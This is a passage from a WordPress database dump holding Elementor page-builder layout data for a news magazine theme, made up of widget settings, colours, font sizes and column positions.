:\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1374,480,'_elementor_version','0.4'),(1375,480,'_elementor_css','a:3:{s:4:\"time\";i:1508914766;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1376,481,'_elementor_edit_mode','builder'),(1377,481,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1sdsi6e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"dhtcvad\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"q73qhhi\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"loop_infinite_class\":\"loop-infinte-list-1\",\"text_align\":\"left\",\"post_icon_size_post_list_1\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_line_height\":{\"unit\":\"em\",\"size\":1.4},\"use_category_post_list_1\":\"\",\"post_list_1_title_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":15},\"use_meta_post_list_1\":\"\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_font_size\":{\"unit\":\"px\",\"size\":3},\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height\":{\"unit\":\"em\",\"size\":1.4},\"post_list1_margin_bottom\":10,\"width\":\"400\",\"height\":\"400\",\"_background_background\":\"classic\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":false},{\"id\":\"c999aha\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"d8tqobd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"szy1sdj\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(1378,481,'_elementor_version','0.4'),(1379,482,'_elementor_edit_mode','builder'),(1380,482,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"categor